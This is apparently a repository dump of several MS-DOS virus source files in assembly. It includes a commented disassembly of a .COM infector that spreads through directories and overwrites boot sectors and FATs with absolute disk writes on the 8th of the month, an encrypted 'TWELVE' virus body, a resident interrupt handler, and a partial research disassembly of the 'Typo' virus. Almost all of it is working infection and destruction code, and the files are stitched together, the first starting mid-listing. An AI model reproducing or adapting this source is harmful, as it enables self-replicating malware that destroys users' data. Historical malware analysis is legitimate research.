mov cx,80h
mov si,0
mov bx,80h
locloop_2:
mov ax,[bx+si]
push ax
inc si
inc si
loop locloop_2 ; Loop if cx > 0
mov byte ptr ds:data_12e,0 ; (76AC:0114=0BAh)
mov byte ptr ds:data_13e,0 ; (76AC:013E=9Eh)
mov byte ptr ds:data_14e,0 ; (76AC:013F=0)
mov byte ptr ds:data_20e,0 ; (76AC:0148=0)
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
; then store it
mov ds:data_12e,al ; (76AC:0114=0BAh)
mov ds:data_17e,al ; (76AC:0143=3Dh)
mov ah,47h
mov dl,0
mov si,116h
int 21h ; DOS Services ah=function 47h
; get full pathname for current drive
; putting it in the buffer pointed to by SI
push ds
mov ax,0
mov ds,ax
mov al,ds:data_3e ; (0000:0475=2)
pop ds
mov ds:data_16e,al ; (76AC:0142=0B4h)
cmp al,0
je loc_3 ; Jump if equal (drive c)
mov ah,0Eh
mov dl,2
mov ds:data_17e,dl ; (76AC:0143=3Dh)
int 21h ; DOS Services ah=function 0Eh
; set default drive C:
loc_3:
mov ah,3Bh ; ';'
mov dx,10Fh
int 21h ; DOS Services ah=function 3Bh
; set current dir, path \
loc_4:
mov ah,4Eh ; 'N'
mov cx,3
mov dx,107h
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match (*.com)
jnc loc_5 ; Jump if carry=0 (if found)
jmp loc_8
loc_5:
mov ax,ds:data_8e ; (76AC:0096=58h)
and ax,1Fh
cmp al,1Fh
jne loc_6 ; Jump if not equal
jmp loc_7
loc_6:
; Now it has found a .COM file, opens it then writes itself to it
; and here it makes it's biggest mistake: it writes itself to the OS files,
; leaving them inoperational
mov ax,ds:data_10e ; (76AC:009A=2601h)
mov ds:data_15e,ax ; (76AC:0140=21CDh)
mov ah,43h ; 'C'
mov al,1
mov cl,ds:data_7e ; (76AC:0095=0A1h)
and cx,0FEh
mov dx,9Eh
int 21h ; DOS Services ah=function 43h
; get/set file attrb, file found
mov ah,3Dh ; '='
mov al,2
mov dx,9Eh
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,3Fh ; '?'
mov cx,2E7h
mov dx,0F800h
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov ah,42h ; 'B'
mov al,0
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
mov cx,2E7h
mov dx,100h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,42h ; 'B'
mov al,2
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
mov cx,2E7h
mov dx,0F800h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,57h ; 'W'
mov al,1
mov cx,ds:data_8e ; (76AC:0096=58h)
mov dx,ds:data_9e ; (76AC:0098=44A3h)
or cl,1Fh
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,43h ; 'C'
mov al,1
mov cl,ds:data_7e ; (76AC:0095=0A1h)
mov dx,9Eh
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
inc byte ptr ds:data_13e ; (76AC:013E=9Eh)
cmp byte ptr ds:data_13e,3 ; (76AC:013E=9Eh)
je loc_15 ; Jump if equal
loc_7:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_8 ; Jump if carry Set (if no more .com files)
jmp loc_5 ; infect next file
loc_8:
; Now (I'm not sure about this) I think it's looking for subdirectories, so it can spread there
; too.
mov ah,4Eh ; 'N'
mov dx,10Dh
mov cx,12h
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_13 ; Jump if carry Set
loc_9:
cmp byte ptr ds:data_11e,2Eh ; (76AC:009E=0) '.'
jne loc_11 ; Jump if not equal
loc_10:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_9 ; Jump if carry=0
jmp short loc_13
loc_11:
mov ah,3Bh ; ';'
mov dx,9Eh
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
jc loc_10 ; Jump if carry Set
mov cx,0Bh
mov si,0
mov bx,80h
locloop_12:
mov ax,[bx+si]
push ax
inc si
inc si
loop locloop_12 ; Loop if cx > 0
inc byte ptr ds:data_14e ; (76AC:013F=0)
jmp loc_4
; yes, it should have been directories, for now it has changed the path and has gone
; off infecting files again
loc_13:
; if it has found them all, it goes on to the next wickedness...
cmp byte ptr ds:data_14e,0 ; (76AC:013F=0)
je loc_15 ; Jump if equal
dec byte ptr ds:data_14e ; (76AC:013F=0)
mov ah,3Bh ; ';'
mov dx,111h
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
mov cx,0Bh
mov di,14h
mov bx,80h
locloop_14:
pop ax
mov [bx+di],ax
dec di
dec di
loop locloop_14 ; Loop if cx > 0
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_13 ; Jump if carry Set
jmp short loc_9
loc_15:
; Finally, it it wasn't bugged and very amateurish
; (making the infected files useless)
; it would check for a date and then destroy the current disk if it was that date
; ( The 8 of each month. Why???)
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dx=mon/day
cmp dl,8
jne loc_16 ; Jump if not equal
mov byte ptr ds:data_20e,1 ; (76AC:0148=0)
mov al,ds:data_17e ; (76AC:0143=3Dh)
mov cx,0A0h
mov dx,0
mov bx,0
int 26h ; Absolute disk write, drive al
; Write over the boot sector (and the partition table, if it's a hard disk),
;the root directory and probably both FATs (if the DOS partition is the first
; on the HD, off course), then try doing the same to second HD)
popf ; Pop flags
cmp byte ptr ds:data_16e,2 ; (76AC:0142=0B4h)
jne loc_17 ; Jump if not equal
mov al,3
mov cx,0A0h
mov dx,0
mov bx,0
int 26h ; Absolute disk write, drive al
popf ; Pop flags
jmp short loc_17
loc_16:
mov ah,0Eh
mov dl,ds:data_12e ; (76AC:0114=0BAh)
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
mov ah,3Bh ; ';'
mov dx,115h
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
; Now change the interrupts again
loc_17:
cli ; Disable interrupts
push es
mov ax,0
mov es,ax
mov ax,ds:data_18e ; (76AC:0144=2B0h)
mov es:data_1e,ax ; (0000:0058=0A9Ch)
mov ax,ds:data_19e ; (76AC:0146=9EBAh)
mov es:data_2e,ax ; (0000:005A=0D81h)
pop es
in al,21h ; port 21h, 8259-1 int IMR
and al,0FDh
out 21h,al ; port 21h, 8259-1 int comands
sti ; Enable interrupts
cmp byte ptr ds:data_20e,1 ; (76AC:0148=0)
jne loc_20 ; Jump if not equal
mov cx,2Ch
mov di,0
mov bx,14Bh
locloop_18:
xor byte ptr [bx+di],0AAh
inc di
loop locloop_18 ; Loop if cx > 0
mov cx,10h
mov di,0
mov bx,17Ah
locloop_19:
; Finally write something on the screen, it seems like blanks
; wait for for a keypress (doesn't matter which) then jump somewhere I can't understand.
xor byte ptr [bx+di],0AAh
inc di
loop locloop_19 ; Loop if cx > 0
mov ah,9
mov dx,data_21e ; (76AC:014B=8Bh)
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ah,9
mov dx,data_22e ; (76AC:017A=40h)
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ah,7
int 21h ; DOS Services ah=function 07h
; get keybd char al, no echo
loc_20:
mov cx,80h
mov di,0FEh
mov bx,80h
locloop_21:
pop ax
mov [bx+di],ax
dec di
dec di
loop locloop_21 ; Loop if cx > 0
mov cx,8
mov si,3DFh
mov di,0F800h
cld ; Clear direction
rep movsb ; Rep while cx>0 Mov [si] to es:[di]
mov cx,2E7h
mov si,ds:data_15e ; (76AC:0140=21CDh)
add si,100h
jmp $+0 ;replaced a jump to an inexistant loc_22
db 0BFh, 0, 1, 0F3h, 0A4h, 0E9h
db 0F8h, 8, 0EBh
db 5Dh
db 93 dup (90h)
db 0B8h, 0, 0, 0CDh, 21h
db 643 dup (0)
tw endp
code_seg_a ends
end


302
MSDOS/Virus.MSDOS.Unknown.twelve.asm Normal file
View File

@ -0,0 +1,302 @@
PAGE 59,132
;ロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロ
;ロロ ロロ
;ロロ TWELVE ロロ
;ロロ ロロ
;ロロ Created: 26-Apr-90 ロロ
;ロロ Version: ロロ
;ロロ Passes: 5 Analysis Options on: H ロロ
;ロロ ロロ
;ロロ ロロ
;ロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロ
data_1e equ 3366h ; (7415:3366=0)
data_2e equ 7EF7h ; (7415:7EF7=0)
data_3e equ 8C8Dh ; (7415:8C8D=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
twelve proc far
start:
;* jmp $+4h ;*
db 0E9h, 1, 0
db 21h, 46h, 0B8h, 9Bh, 1Ah, 0BFh
db 2Bh, 1, 90h, 4Bh, 0F8h, 0FCh
db 0B9h, 71h, 5, 31h, 0Dh, 2Bh
db 0DAh, 33h, 0D9h, 2Bh, 0D9h, 2Bh
db 0D8h, 90h, 33h, 0D1h, 31h, 5
db 46h, 43h, 0F8h, 40h, 90h, 47h
db 0E2h, 0E9h, 40h, 40h, 61h, 1Fh
db 6Eh, 3, 0C9h, 82h, 6Fh, 36h
db 0D1h, 5Ah, 8Bh, 33h, 0C3h, 6Bh
db 0D5h, 0D7h, 85h, 0CCh, 17h, 4Eh
db 0E9h, 0F3h, 7Ch, 0B1h, 29h, 52h
db 0FBh, 0FFh, 74h, 0B5h, 2Bh, 56h
db 0F9h, 0F3h, 64h, 0A9h, 0Dh, 32h
db 9Bh, 97h, 1Ch, 0D5h, 7Fh, 64h
db 82h, 7Bh, 0ADh, 94h, 1Eh, 61h
db 6Ch, 29h, 7Dh, 0F3h, 4Ah, 0F7h
db 0F4h, 4Ah, 0FEh, 0FFh, 1, 0
db 51h, 7Ch, 7, 47h, 0DDh, 22h
db 0CCh, 0EFh, 0D5h, 1Bh, 0F2h, 81h
db 0DEh, 36h, 5Fh, 0D1h, 0D3h, 63h
db 0FAh, 1Eh, 0CCh, 23h, 0E1h, 76h
db 0ABh, 0Bh, 39h, 5Ch, 0DEh, 0B9h
db 3, 0F4h, 7Eh, 21h, 74h, 31h
db 0Ch, 0EFh, 59h, 9, 0D9h, 37h
db 12h, 44h, 92h, 18h, 30h, 12h
db 0ABh, 16h, 14h, 4Ch, 0BAh, 6Eh
db 2Bh, 6Fh, 0F5h, 5Bh, 4Ch, 0F3h
db 7Dh, 0Dh, 53h, 4Ah, 0F1h, 0F7h
db 59h, 5Dh, 98h, 2, 0Fh, 29h
db 8Bh, 0D0h, 5Ch, 0ADh, 29h, 54h
db 3, 52h, 13h, 76h, 0D5h, 58h
db 13h, 4, 0D7h, 63h, 39h, 74h
db 8Bh, 7, 0FDh, 8Ah, 0F9h, 1Ah
db 0D1h, 0F5h, 39h, 0EDh, 0BBh, 0C9h
db 63h, 8Dh, 0B9h, 97h, 1Eh, 6Dh
db 0BBh, 14h, 0EBh, 67h, 14h, 50h
db 34h, 93h, 41h, 0D3h, 0D6h, 87h
db 0FEh, 0CBh, 0F5h, 87h, 0F9h, 55h
db 16h, 7, 39h, 49h, 0F5h, 0F3h
db 0B6h, 0F0h, 64h, 0A5h, 21h, 57h
db 28h, 2Ch, 0A9h, 0DCh, 6Dh, 8Fh
db 7Fh, 5Eh, 0ABh, 21h, 66h, 1Ch
db 6Ch, 35h, 63h, 0F7h, 4Ch, 0F5h
db 0FDh, 0Ch, 59h, 78h, 6, 43h
db 0BBh, 78h, 3Bh, 6Eh, 2Fh, 0B2h
db 15h, 0AEh, 16h, 13h, 0D0h, 3Eh
db 0F6h, 15h, 85h, 0DBh, 0A1h, 5Ch
db 20h, 0CEh, 9Eh, 0F0h, 1Eh, 68h
db 39h, 78h, 79h, 8, 0FDh, 0D7h
db 0EAh, 0CBh, 0EAh, 87h, 0, 6Eh
db 51h, 28h, 0D5h, 0D7h, 2Dh, 0A7h
db 38h, 5Ch, 61h, 28h, 0D5h, 0DDh
db 0A1h, 0Dh, 66h, 91h, 1Fh, 0A5h
db 74h, 31h, 0Ah, 0F3h, 51h, 55h
db 0C1h, 0F3h, 80h, 0Dh, 0ABh, 4Bh
db 0EDh, 0ACh, 66h, 45h, 14h, 55h
db 34h, 93h, 50h, 0BEh, 14h, 0DDh
db 63h, 2Fh, 94h, 0D0h, 6Ch, 0Eh
db 13h, 0Ch, 7Eh, 21h, 74h, 31h
db 5Ch, 0FFh, 30h, 0D2h, 4Dh, 0F5h
db 0C8h, 78h, 3Bh, 6Eh, 2Fh, 72h
db 0D5h, 1Ah, 0F4h, 0A0h, 0D9h, 36h
db 0B5h, 0D2h, 19h, 5Ch, 0Dh, 6Bh
db 0EDh, 0B8h, 20h, 0D2h, 7Ch, 0B9h
db 0Dh, 7Ah, 0ABh, 5, 49h, 0CCh
db 4Ch, 0F4h, 0F5h, 78h, 3Bh, 6Eh
db 2Fh, 83h, 12h, 0DDh, 33h, 0D8h
db 41h, 31h, 0, 0D8h, 0E7h, 0D8h
db 11h, 14h, 26h, 0ADh, 0DAh, 0E2h
db 39h, 8Fh, 35h, 0F1h, 0BFh, 33h
db 0CCh, 7Bh, 0F5h, 0F7h, 4Fh, 0F3h
db 0EDh, 22h, 0CCh, 0A0h, 0D6h, 3Eh
db 0C0h, 0D2h, 11h, 55h, 4, 1Fh
db 0Ah, 83h, 1Dh, 82h, 21h, 6Ah
db 45h, 0F0h, 0F5h, 3Bh, 15h, 9Ah
db 79h, 6Bh, 0FDh, 72h, 34h, 2Ah
db 0F1h, 3Fh, 89h, 0, 13h, 5Fh
db 0E1h, 62h, 7Ah, 3Ch, 9Eh, 53h
db 0Fh, 88h, 98h, 23h, 0B9h, 5Eh
db 0CCh, 0DCh, 3Ch, 3Fh, 0Bh, 80h
db 0A3h, 3, 31h, 3Eh, 0D4h, 0D7h
db 0F4h, 3Bh, 3Dh, 0B0h, 0ABh, 1Fh
db 21h, 34h, 17h, 28h, 0D5h, 1Fh
db 0F9h, 0FEh, 18h, 0D7h, 19h, 1Bh
db 90h, 95h, 5, 23h, 6Ah, 0FDh
db 71h, 0F0h, 0F5h, 0AAh, 31h, 0FFh
db 7Ch, 32h, 0D2h, 0F6h, 7Ch, 7Fh
db 0ECh, 0EFh, 21h, 83h, 6Dh, 0EDh
db 15h, 98h, 5Bh, 0EFh, 0D1h, 2Dh
db 0A2h, 51h, 0FFh, 9Ah, 69h, 0EBh
db 0EDh, 3Fh, 1Ch, 95h, 0Bh, 3Fh
db 0FEh, 7Dh, 12h, 2Eh, 0F6h, 3Bh
db 25h, 0A8h, 33h, 6Eh, 2Eh, 0F4h
db 0D5h, 10h, 93h, 35h, 0DAh, 0DFh
db 35h, 0C7h, 0D4h, 5Eh, 0ABh, 3Dh
db 6Ch, 2Ch, 0FDh, 0F3h, 39h, 0D1h
db 14h, 0B5h, 1Bh, 7Ch, 0FDh, 3Fh
db 0B9h, 53h, 0F4h, 0F2h, 6Ch, 2Ch
db 0FDh, 93h, 59h, 20h, 0CAh, 6Bh
db 9Dh, 26h, 9Fh, 93h, 1Eh, 0E1h
db 79h, 5Fh, 17h, 94h, 2Bh, 0D6h
db 0F5h, 4, 51h, 78h, 0BBh, 11h
db 0D6h, 34h, 0BAh, 5Dh, 7Eh, 0BDh
db 1, 6Eh, 4, 65h, 0D6h, 0ECh
db 1Ah, 0A7h, 0D4h, 65h, 0DDh, 0D3h
db 3Dh, 61h, 0D5h, 38h, 0, 23h
db 66h, 85h, 19h, 0A1h, 7Eh, 0Dh
db 31h, 5Eh, 0E5h, 0CAh, 0F5h, 76h
db 33h, 0A4h, 0EDh, 23h, 0D1h, 0AEh
db 0D3h, 18h, 16h, 99h, 0CBh, 0EDh
db 0B8h, 4Ch, 4Fh, 0FEh, 86h, 12h
db 0E9h, 0E9h, 0EDh, 0A3h, 0Ah, 15h
db 39h, 1Ah, 66h, 0DCh, 0C0h, 1Fh
db 0F1h, 3Bh, 96h, 0E5h, 0F1h, 57h
db 0EDh, 91h, 6Ch, 0D7h, 0D5h, 69h
db 0DDh, 0DFh, 10h, 0F2h, 0A7h, 0D8h
db 61h, 93h, 54h, 0ECh, 0EDh, 3Fh
db 21h, 0A8h, 23h, 72h, 3Fh, 6Ch
db 0FDh, 3Eh, 0D4h, 7Ch, 0A3h, 9
db 66h, 0A1h, 15h, 12h, 74h, 77h
db 6Ah, 12h, 54h, 80h, 9Dh, 2Bh
db 94h, 0C0h, 58h, 0B2h, 59h, 0D1h
db 20h, 0D2h, 4Dh, 0F6h, 0B6h, 78h
db 0B3h, 9, 76h, 25h, 74h, 35h
db 54h, 0F3h, 20h, 0CEh, 0F3h, 58h
db 83h, 2Bh, 5Bh, 8Dh, 23h, 6Bh
db 0C7h, 1Eh, 0F4h, 0C8h, 8Ch, 0E0h
db 2Dh, 0DCh, 36h, 0C0h, 27h, 0C4h
db 3, 78h, 18h, 40h, 0FDh, 0F2h
db 0A2h, 1Fh, 5Bh, 0F3h, 2Eh, 64h
db 0A3h, 0E3h, 94h, 0E6h, 29h, 92h
db 9Ch, 0DEh, 55h, 81h, 0C4h, 0DEh
db 0C4h, 0DAh, 3Ch, 26h, 64h, 0BDh
db 5, 76h, 14h, 0F4h, 0FDh, 0AEh
db 0BCh, 0C0h, 35h, 0Eh, 26h, 23h
db 0B4h, 2Ch, 0B5h, 83h, 16h, 3Fh
db 0Ch, 2Ch, 58h, 0Fh, 0A8h, 2Ah
db 0DEh, 7, 5Eh, 12h
loc_1:
cmp al,0Fh
mov bp,7E24h
aas ; Ascii adjust
lodsw ; String [si] to ax
mov bl,2Ah ; '*'
cld ; Clear direction
mov bx,7E1Fh
pop es
push es
push di
db 2Eh, 55h, 0EDh, 93h, 7Dh, 49h
db 6Ah, 18h, 5Fh, 0BCh, 0DBh, 75h
db 0AEh, 0D1h, 73h, 0E6h, 1Eh, 2Ch
db 0BEh, 78h, 29h, 0A7h, 0A3h
db 78h
locloop_2:
mov bh,ch
add dh,ds:data_2e[si] ; (7415:7EF7=0)
adc word ptr [bx],41h
esc 7,cl ; coprocessor escape
pop cx
xchg ax,dx
rcr cl,1 ; Rotate thru carry
rcl byte ptr [di-68h],cl ; Rotate thru carry
esc 2,ds:data_3e[di] ; (7415:8C8D=0) coprocessor escape
sbb al,ds:data_1e[bx+si] ; (7415:3366=0)
loc_3:
mov bp,7EA5h
adc word ptr [bx+di],0CD5Fh
sti ; Enable interrupts
ja loc_1 ; Jump if above
db 0F2h, 0D3h, 0Bh, 7Bh, 0AAh, 0E8h
db 0B3h
db 4Bh, 4Dh
loc_5:
esc 3,[bp+si+4E0Eh] ; coprocessor escape
movsb ; Mov [si] to es:[di]
push ds
adc [bp+0Bh],al
popf ; Pop flags
push si
add al,dl
db 6Fh, 0F3h, 0Fh, 54h, 0F9h, 0F3h
db 76h, 0B9h, 11h, 0DEh, 90h, 0F7h
db 56h, 0F7h, 0EDh
loc_6:
loopz locloop_2 ; Loop if zf=1, cx>0
;* jo loc_4 ;*Jump if overflow=1
db 70h, 0D3h
xlat [bx] ; al=[al+[bx]] table
jbe loc_5 ; Jump if below or =
esc 5,[si] ; coprocessor escape
test cx,sp
dec ax
adc al,49h ; 'I'
int 0BDh
push di
in ax,dx ; port 0, DMA-1 bas&add ch 0
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
call $-4A7Fh
sbb ax,5E05h
push bp
jl loc_3 ; Jump if <
das ; Decimal adjust
dec si
;* jmp short loc_7 ;*(04BD)
db 0EBh, 0EDh
db 18h, 0D3h, 49h, 36h, 95h, 9Dh
db 14h, 0DBh, 71h, 36h, 99h, 95h
db 68h, 0B5h, 0F0h, 70h, 30h, 4Ah
db 0DCh, 0F4h, 4Bh, 66h, 0E5h, 44h
db 82h, 0F0h, 0Fh, 9, 0B5h, 0A6h
db 7Fh, 0DCh, 0D6h, 0E4h, 0DAh, 0E6h
db 2, 0EEh, 6, 0F6h, 0Bh, 0FEh
db 0Eh, 0FEh
db 9
loc_8:
jge loc_6 ; Jump if > or =
stosb ; Store al to es:[di]
mov al,0B3h
mov ch,0Dh
mov ax,1D6Dh
sbb dh,al
cmc ; Complement carry
hlt ; Halt processor
div al ; al, ah rem = ax/reg
jmp short loc_8 ; (04FD)
db 0E4h, 12h, 1Fh, 16h, 1Eh, 12h
db 11h, 1Eh, 10h, 11h, 1Bh, 15h
db 5, 11h, 0FFh, 0EDh, 0F9h, 0F1h
db 0E3h, 0F5h, 0EDh, 0F1h, 0E7h, 0FEh
db 0E1h, 0F2h, 0E8h, 0F6h, 0EBh, 0F2h
db 0F2h, 0EEh, 0CDh, 0D2h, 0F4h, 0D6h
db 0F7h, 0D2h, 0FEh, 0DEh, 0F9h, 58h
db 9Bh, 3Fh, 5Eh, 95h, 7, 64h
db 13h, 72h, 1Ah, 41h, 0F6h, 1Bh
db 0DCh, 0FFh, 49h, 0B3h, 4Ch, 1Bh
db 0F1h, 78h, 3Bh, 6Eh, 7, 4Eh
db 96h, 5Ah, 0B4h, 0Fh, 0CDh, 14h
db 0D3h, 7Bh, 1Eh, 0D1h, 7Fh, 18h
db 13h, 6Eh, 2, 45h, 0F6h, 1Fh
db 0F6h, 0F3h, 0A5h, 62h, 3Eh, 0C2h
db 0F0h, 0C6h, 0F8h, 0B3h, 0AAh, 0Dh
db 15h, 10h, 61h, 0D7h, 18h, 3Ah
db 0DCh, 0DFh, 0F7h, 0FDh, 96h, 98h
db 98h, 0D3h, 0BDh, 0AEh, 0B9h, 0BBh
db 0C8h, 0B6h, 0B2h, 0B2h, 0AFh, 0D1h
db 0BEh, 0BCh, 0B8h, 0F7h, 0F5h, 0BEh
db 0EDh, 0EFh, 0EDh, 13h, 14h, 16h
db 14h, 12h, 1Ch, 1Eh, 1Ch, 12h
db 14h, 16h, 14h, 12h, 0ECh, 0EFh
db 0EDh, 0F3h, 0F5h, 0F7h, 0F5h, 0F3h
db 0FDh, 0FFh, 0FDh, 0F3h, 0F5h, 0F7h
db 0F5h, 0F3h, 0EDh, 0EFh, 0EDh, 0D3h
db 0D5h, 0D7h, 0D5h, 0D3h, 0DDh, 0DFh
db 0DDh, 0D3h, 0D5h, 0D7h, 0D5h, 0D3h
db 0EDh, 0EFh, 0EDh, 0F3h, 0F5h, 0F4h
db 0CAh, 0CCh, 0C2h, 0C0h, 0C2h, 0CCh
db 0CAh, 0C8h, 0B6h, 0BCh, 0A0h, 0ECh
db 0E3h, 93h, 95h, 97h, 29h, 5Fh
db 0B6h, 9Fh, 0BDh, 58h, 0Fh, 0Dh
db 81h, 97h, 0EDh, 0EFh, 0EDh, 0B2h
db 0B2h, 0B6h, 0A7h, 0DDh, 0BEh, 0B0h
db 0B0h, 0F3h, 0F5h, 0BAh, 0F5h, 0F3h
db 0EDh, 0EFh, 0EDh
twelve endp
seg_a ends
end start

59
MSDOS/Virus.MSDOS.Unknown.twer_com.asm Normal file
View File

@ -0,0 +1,59 @@
SEG_A segment byte public
assume cs:seg_a,ds:seg_a
org 100h
MULTIPLEXOR proc far
start:
jmp BEGIN
MULTIPLEXOR endp
; Subroutine work on the DOS Int2Fh (Multiplexor)
; It stay rezident and calling Old Int2Fh, if don't call FnBAh.
; Functions (ah=BAh): ³ Return:
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; al=0 ³ al=0ffh, bl=READ_ON
; al=1 ³ bl=READ_ON=1
; al=2 ³ bl=READ_ON=0
; al=3 ³ Calling WRITE; bl=READ_ON=1
ADM proc
cmp ah,byte ptr cs:ADM_INT
je ADM_WORK
db 0eah
INT2F_JUMP db 0,0,0b2h,89h
ADM_WORK:
cmp al,0
jne ADM_WORK1
mov al,0ffh
IRET
ADM_WORK1:
push dx
push ax
mov dl,al
mov ah,2
int 21h
pop ax
pop dx
IRET
ADM endp
ADM_INT db 93h
REZIDENT:
BEGIN:
; Init interrupt vectors
mov ax,352fh
int 21h
mov word ptr cs:INT2F_JUMP,bx
mov word ptr cs:INT2F_JUMP+2,es
mov al,2fh
mov dx,offset ADM
mov ah,25h
int 21h
mov ah,093h
mov al,'*'
int 2fh
mov dx,offset REZIDENT
int 27h
SEG_A ends
end start

433
MSDOS/Virus.MSDOS.Unknown.typo.asm Normal file
View File

@ -0,0 +1,433 @@
page 65,132
title The 'Typo' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Typo' Virus º
; º Disassembled by Joe Hirst, October 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
VECTOR SEGMENT AT 0
; Interrupt vectors
ORG 58H
BW0058 DW ? ; Interrupt 16H offset
BW005A DW ? ; Interrupt 16H segment
ORG 80H
BW0080 DW ? ; Interrupt 20H offset
BW0082 DW ? ; Interrupt 20H segment
BW0084 DW ? ; Interrupt 21H offset
BW0086 DW ? ; Interrupt 21H segment
VECTOR ENDS
RAM SEGMENT AT 400H
; System data
ORG 6CH
BW046C DW ? ; System clock
RAM ENDS
HOST SEGMENT AT 0
ORG 2CH
DW002C DW ?
ORG 0D0H
DW00D0 EQU THIS WORD
DB00D0 DB ?
ORG 100H
DB0100 DB ?
DW0101 DW ?
HOST ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:HOST
DB 'V1' ; Signature
DB 0E9H, 1, 0 ; Jump for start of host
DB '*.COM', 0 ; File spec for infection
DB 0CEH, 0CDH, 20H ; File start read buffer
DB 'V1' ; Signature test read buffer
DW 5 ; File handle
DB 0CDH, 20H, 90H ; Start of host
DB 0
DW 5AH ; Generation count
DB 0
; Entry point
START: PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
PUSH SI
PUSH CS
POP DS
CALL BP0024 ; \ Get current address
BP0024: POP SI ; /
SUB SI,24H ; Relocate from start of virus
DEC WORD PTR [SI+16H] ; Subtract from generation count
CMP WORD PTR [SI+16H],3 ; Is generation count three?
JNE BP0036 ; Branch if not
MOV WORD PTR [SI+16H],005BH ; Reset generation count to 91
BP0036: CALL BP02BE ; Test system for infection
MOV DX,00D0H ; Temp default DTA
MOV AH,1AH ; Set DTA function
INT 21H ; DOS service
MOV AL,[SI+0BH] ; \ Save start of host (1)
MOV [SI+12H],AL ; /
MOV AX,[SI+0CH] ; \ Save start of host (2)
MOV [SI+13H],AX ; /
MOV AH,2AH ; Get date function
INT 21H ; DOS service
TEST DL,1 ; First of month?
JNZ BP0074 ; Branch if not
MOV DX,SI ; \ Address '*.COM'
ADD DX,5 ; /
nop
XOR CX,CX ; No attributes
MOV AH,4EH ; Find first file function
INT 21H ; DOS service
JB BP0074 ; Branch if not found
BP0063: CALL BP0092 ; Test for infection
MOV DX,SI ; \ Address '*.COM'
ADD DX,5 ; /
nop
XOR CX,CX ; No attributes
MOV AH,4FH ; Find next file function
INT 21H ; DOS service
JNB BP0063 ; Branch if found
BP0074: MOV AL,[SI+12H] ; \ Restore start of host (1)
MOV DB0100,AL ; /
MOV AX,[SI+13H] ; \ Restore start of host (2)
MOV DW0101,AX ; /
MOV DX,0080H ; Original default DTA
MOV AH,1AH ; Set DTA function
INT 21H ; DOS service
POP SI
POP ES
POP DS
POP DX
POP CX
POP BX
MOV AX,0100H ; \ Branch to start of host
JMP AX ; /
; Test for infection in COM file
BP0092: MOV AX,4301H ; Set file attributes function
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
XOR CX,CX ; No attributes
INT 21H ; DOS service
MOV AX,3D02H ; Open handle (R/W) function
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
INT 21H ; DOS service
JNB BP00A9 ; Branch if no error
JMP BP015D ; Return
BP00A9: MOV [SI+10H],AX ; Save file handle
MOV BX,AX ; Move file handle
MOV AH,3FH ; Read handle function
MOV CX,3 ; Length to read
MOV DX,SI ; \ Address start-of-host store
ADD DX,000BH ; /
nop
INT 21H ; DOS service
CMP BYTE PTR [SI+0BH],0E9H ; Is it a jump?
JNE BP00F1 ; Branch if not
MOV DX,[SI+0CH] ; \
SUB DX,16H ; /
XOR CX,CX ; No high offset
MOV AX,4200H ; Move file pointer function
MOV BX,[SI+10H] ; Get file handle
INT 21H ; DOS service
MOV BX,AX ; Move actual offset (? not used)
MOV AH,3FH ; Read handle function
